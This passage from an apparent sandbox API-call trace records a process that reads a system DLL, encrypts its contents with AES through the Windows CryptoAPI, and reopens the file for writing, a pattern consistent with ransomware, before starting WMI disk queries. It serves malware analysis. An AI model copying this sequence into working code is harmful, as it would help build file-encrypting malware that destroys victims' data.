(dwNewMode=0x0, lpOldMode=0x6d8edc0) returned 1 [0186.313] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", nBufferLength=0x105, lpBuffer=0x6d8e804, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpFilePart=0x0) returned 0x43 [0186.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ecf8) returned 1 [0186.313] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0186.314] GetFileType (hFile=0x598) returned 0x1 [0186.315] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ecf4) returned 1 [0186.315] GetFileType (hFile=0x598) returned 0x1 [0186.315] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x6d8ee00 | out: lpFileSizeHigh=0x6d8ee00*=0x0) returned 0x16af90 [0186.320] ReadFile (in: hFile=0x598, lpBuffer=0x6de8dc8, nNumberOfBytesToRead=0x16af90, lpNumberOfBytesRead=0x6d8edac, lpOverlapped=0x0 | out: lpBuffer=0x6de8dc8*, lpNumberOfBytesRead=0x6d8edac*=0x16af90, lpOverlapped=0x0) returned 1 [0186.553] CloseHandle (hObject=0x598) returned 1 [0186.553] CryptAcquireContextW (in: phProv=0x6d8ed4c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6d8ed4c*=0xbe00b8) returned 1 [0186.555] CryptGenRandom (in: hProv=0xbe00b8, dwLen=0x10, pbBuffer=0x37542f0 | out: pbBuffer=0x37542f0) returned 1 [0188.810] CryptImportKey (in: hProv=0xbe00b8, pbData=0x36e4b6c, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6d8ed1c | out: phKey=0x6d8ed1c*=0xb7f890) returned 1 [0188.810] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.810] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.810] CryptDuplicateKey (in: hKey=0xb7f890, pdwReserved=0x0, dwFlags=0x0, phKey=0x6d8ed0c | out: phKey=0x6d8ed0c*=0xb7f5d0) returned 1 [0188.810] CryptContextAddRef (hProv=0xbe00b8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.810] CryptSetKeyParam (hKey=0xb7f5d0, dwParam=0x4, pbData=0x36e4c4c*=0x1, dwFlags=0x0) returned 1 [0188.810] CryptSetKeyParam (hKey=0xb7f5d0, dwParam=0x1, pbData=0x36e4c18, dwFlags=0x0) returned 1 [0188.816] CryptEncrypt (in: hKey=0xb7f5d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6fa9f28*, pdwDataLen=0x6d8ed78*=0x16afa0, dwBufLen=0x16afa0 | out: pbData=0x6fa9f28*, pdwDataLen=0x6d8ed78*=0x16afa0) returned 1 [0188.829] CryptEncrypt (in: hKey=0xb7f5d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x36e4c74*, pdwDataLen=0x6d8ed80*=0x0, dwBufLen=0x10 | out: pbData=0x36e4c74*, pdwDataLen=0x6d8ed80*=0x10) returned 1 [0188.831] CryptDestroyKey (hKey=0xb7f890) returned 1 [0188.831] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0188.831] CryptReleaseContext (hProv=0xbe00b8, dwFlags=0x0) returned 1 [0188.831] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", nBufferLength=0x105, lpBuffer=0x6d8e7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpFilePart=0x0) returned 0x43 [0188.831] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6d8ece4) returned 1 [0188.831] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x4e0 [0188.832] GetFileType (hFile=0x4e0) returned 0x1 [0188.832] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6d8ece0) returned 1 [0188.832] GetFileType (hFile=0x4e0) returned 0x1 [0188.832] WriteFile (in: hFile=0x4e0, lpBuffer=0x36e5294*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x6d8ed74, lpOverlapped=0x0 | out: lpBuffer=0x36e5294*, lpNumberOfBytesWritten=0x6d8ed74*=0x20, lpOverlapped=0x0) returned 1 [0188.833] CloseHandle (hObject=0x4e0) returned 1 [0188.833] CoTaskMemAlloc (cb=0x20c) returned 0xbed438 [0188.833] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0xbed438 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0188.833] CoTaskMemFree (pv=0xbed438) [0188.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x6d8e7d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0188.834] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ed20 | out: ppv=0x6d8ed20*=0xb51e34) returned 0x0 [0188.834] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ed18 | out: pAptType=0x6d8ed18*=1) returned 0x0 [0188.834] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ed1c | out: ppvObject=0x6d8ed1c*=0x0) returned 0x80004002 [0188.834] IUnknown:Release (This=0xb51e34) returned 0x1 [0188.835] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e688 | out: ppv=0x6d8e688*=0x6027810) returned 0x0 [0188.835] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027810, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e8a0 | out: ppvObject=0x6d8e8a0*=0x0) returned 0x80004002 [0188.835] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027810, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e8b4 | out: ppvObject=0x6d8e8b4*=0x6031120) returned 0x0 [0188.835] WbemDefPath:IUnknown:Release (This=0x6027810) returned 0x0 [0188.835] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4d4 | out: ppvObject=0x6d8e4d4*=0x6031120) returned 0x0 [0188.835] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e490 | out: ppvObject=0x6d8e490*=0x0) returned 0x80004002 [0188.836] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0188.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8ddec | out: ppvObject=0x6d8ddec*=0x0) returned 0x80004002 [0188.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dd9c | out: ppvObject=0x6d8dd9c*=0x0) returned 0x80004002 [0188.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dda8 | out: ppvObject=0x6d8dda8*=0x66ce2d8) returned 0x0 [0188.836] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce2d8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8ddb0 | out: pCid=0x6d8ddb0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0188.836] WbemDefPath:IUnknown:Release (This=0x66ce2d8) returned 0x3 [0188.836] CoGetContextToken (in: pToken=0x6d8de08 | out: pToken=0x6d8de08) returned 0x0 [0188.836] CoGetContextToken (in: pToken=0x6d8e210 | out: pToken=0x6d8e210) returned 0x0 [0188.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e2a0 | out: ppvObject=0x6d8e2a0*=0x0) returned 0x80004002 [0188.836] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0188.836] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x1 [0188.836] CoGetContextToken (in: pToken=0x6d8eb98 | out: pToken=0x6d8eb98) returned 0x0 [0188.836] CoGetContextToken (in: pToken=0x6d8eaf8 | out: pToken=0x6d8eaf8) returned 0x0 [0188.836] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031120, riid=0x6d8ebc8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8ebc4 | out: ppvObject=0x6d8ebc4*=0x6031120) returned 0x0 [0188.836] WbemDefPath:IUnknown:AddRef (This=0x6031120) returned 0x3 [0188.836] WbemDefPath:IUnknown:Release (This=0x6031120) returned 0x2 [0188.836] WbemDefPath:IWbemPath:SetText (This=0x6031120, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x6d8ed48*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ed48*=0x20, pszText=0x0) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetText (in: This=0x6031120, lFlags=2, puBuffLength=0x6d8ed48*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6d8ed48*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x6d8ed4c | out: puCount=0x6d8ed4c*=0x0) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetInfo (in: This=0x6031120, uRequestedInfo=0x0, puResponse=0x6d8ed54 | out: puResponse=0x6d8ed54*=0xc19) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031120, puCount=0x6d8eccc | out: puCount=0x6d8eccc*=0x0) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6d8ecb8 | out: puCount=0x6d8ecb8*=0x2) returned 0x0 [0188.836] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ecb4*=0xf, pszText=0x0) returned 0x0 [0188.837] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6d8ecb4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ecb4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0188.837] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec68 | out: ppv=0x6d8ec68*=0xb51e34) returned 0x0 [0188.837] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec60 | out: pAptType=0x6d8ec60*=1) returned 0x0 [0188.837] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec64 | out: ppvObject=0x6d8ec64*=0x0) returned 0x80004002 [0188.837] IUnknown:Release (This=0xb51e34) returned 0x1 [0188.837] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e5d0 | out: ppv=0x6d8e5d0*=0x6027830) returned 0x0 [0188.837] WbemDefPath:IUnknown:QueryInterface (in: This=0x6027830, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8e7e8 | out: ppvObject=0x6d8e7e8*=0x0) returned 0x80004002 [0188.837] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6027830, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e7fc | out: ppvObject=0x6d8e7fc*=0x6031190) returned 0x0 [0188.838] WbemDefPath:IUnknown:Release (This=0x6027830) returned 0x0 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e41c | out: ppvObject=0x6d8e41c*=0x6031190) returned 0x0 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e3d8 | out: ppvObject=0x6d8e3d8*=0x0) returned 0x80004002 [0188.838] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8dd34 | out: ppvObject=0x6d8dd34*=0x0) returned 0x80004002 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dce4 | out: ppvObject=0x6d8dce4*=0x0) returned 0x80004002 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dcf0 | out: ppvObject=0x6d8dcf0*=0x66ce468) returned 0x0 [0188.838] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x66ce468, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6d8dcf8 | out: pCid=0x6d8dcf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0188.838] WbemDefPath:IUnknown:Release (This=0x66ce468) returned 0x3 [0188.838] CoGetContextToken (in: pToken=0x6d8dd50 | out: pToken=0x6d8dd50) returned 0x0 [0188.838] CoGetContextToken (in: pToken=0x6d8e158 | out: pToken=0x6d8e158) returned 0x0 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e1e8 | out: ppvObject=0x6d8e1e8*=0x0) returned 0x80004002 [0188.838] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0188.838] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x1 [0188.838] CoGetContextToken (in: pToken=0x6d8eae0 | out: pToken=0x6d8eae0) returned 0x0 [0188.838] CoGetContextToken (in: pToken=0x6d8ea40 | out: pToken=0x6d8ea40) returned 0x0 [0188.838] WbemDefPath:IUnknown:QueryInterface (in: This=0x6031190, riid=0x6d8eb10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6d8eb0c | out: ppvObject=0x6d8eb0c*=0x6031190) returned 0x0 [0188.838] WbemDefPath:IUnknown:AddRef (This=0x6031190) returned 0x3 [0188.838] WbemDefPath:IUnknown:Release (This=0x6031190) returned 0x2 [0188.838] WbemDefPath:IWbemPath:SetText (This=0x6031190, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0188.838] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6d8ec90 | out: puCount=0x6d8ec90*=0x2) returned 0x0 [0188.838] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x6d8ec8c*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec8c*=0xf, pszText=0x0) returned 0x0 [0188.838] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=4, puBuffLength=0x6d8ec8c*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec8c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0188.838] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8ec90 | out: ppv=0x6d8ec90*=0xb51e34) returned 0x0 [0188.839] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6d8ec88 | out: pAptType=0x6d8ec88*=1) returned 0x0 [0188.839] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6d8ec8c | out: ppvObject=0x6d8ec8c*=0x0) returned 0x80004002 [0188.839] IUnknown:Release (This=0xb51e34) returned 0x1 [0188.839] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6d8e8b0 | out: ppv=0x6d8e8b0*=0x601f600) returned 0x0 [0188.839] WbemLocator:IUnknown:QueryInterface (in: This=0x601f600, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6d8eac8 | out: ppvObject=0x6d8eac8*=0x0) returned 0x80004002 [0188.839] WbemLocator:IClassFactory:CreateInstance (in: This=0x601f600, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8eadc | out: ppvObject=0x6d8eadc*=0x6027730) returned 0x0 [0188.839] WbemLocator:IUnknown:Release (This=0x601f600) returned 0x0 [0188.839] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e6fc | out: ppvObject=0x6d8e6fc*=0x6027730) returned 0x0 [0188.839] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6d8e6b8 | out: ppvObject=0x6d8e6b8*=0x0) returned 0x80004002 [0188.840] WbemLocator:IUnknown:AddRef (This=0x6027730) returned 0x3 [0188.840] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6d8e014 | out: ppvObject=0x6d8e014*=0x0) returned 0x80004002 [0188.840] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6d8dfc4 | out: ppvObject=0x6d8dfc4*=0x0) returned 0x80004002 [0189.028] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8dfd0 | out: ppvObject=0x6d8dfd0*=0x0) returned 0x80004002 [0189.028] CoGetContextToken (in: pToken=0x6d8e030 | out: pToken=0x6d8e030) returned 0x0 [0189.028] CoGetContextToken (in: pToken=0x6d8e438 | out: pToken=0x6d8e438) returned 0x0 [0189.028] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6d8e4c8 | out: ppvObject=0x6d8e4c8*=0x0) returned 0x80004002 [0189.028] WbemLocator:IUnknown:Release (This=0x6027730) returned 0x2 [0189.028] WbemLocator:IUnknown:Release (This=0x6027730) returned 0x1 [0189.028] CoGetContextToken (in: pToken=0x6d8eaa8 | out: pToken=0x6d8eaa8) returned 0x0 [0189.028] CoGetContextToken (in: pToken=0x6d8ea08 | out: pToken=0x6d8ea08) returned 0x0 [0189.028] WbemLocator:IUnknown:QueryInterface (in: This=0x6027730, riid=0x6d8ead8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6d8ead4 | out: ppvObject=0x6d8ead4*=0x6027730) returned 0x0 [0189.028] WbemLocator:IUnknown:AddRef (This=0x6027730) returned 0x3 [0189.028] WbemLocator:IUnknown:Release (This=0x6027730) returned 0x2 [0189.028] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6031190, puCount=0x6d8ec6c | out: puCount=0x6d8ec6c*=0x2) returned 0x0 [0189.028] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=8, puBuffLength=0x6d8ec68*=0x0, pszText=0x0 | out: puBuffLength=0x6d8ec68*=0xf, pszText=0x0) returned 0x0 [0189.028] WbemDefPath:IWbemPath:GetText (in: This=0x6031190, lFlags=8, puBuffLength=0x6d8ec68*=0xf, pszText="00000000000000" | out: puBuffLength=0x6d8ec68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0189.029] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6d8eb44 | out: ppv=0x6d8eb44*=0x60276f0) returned 0x0 [0189.029] WbemLocator:IWbemLocator:ConnectServer (in: This=0x60276f0, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, 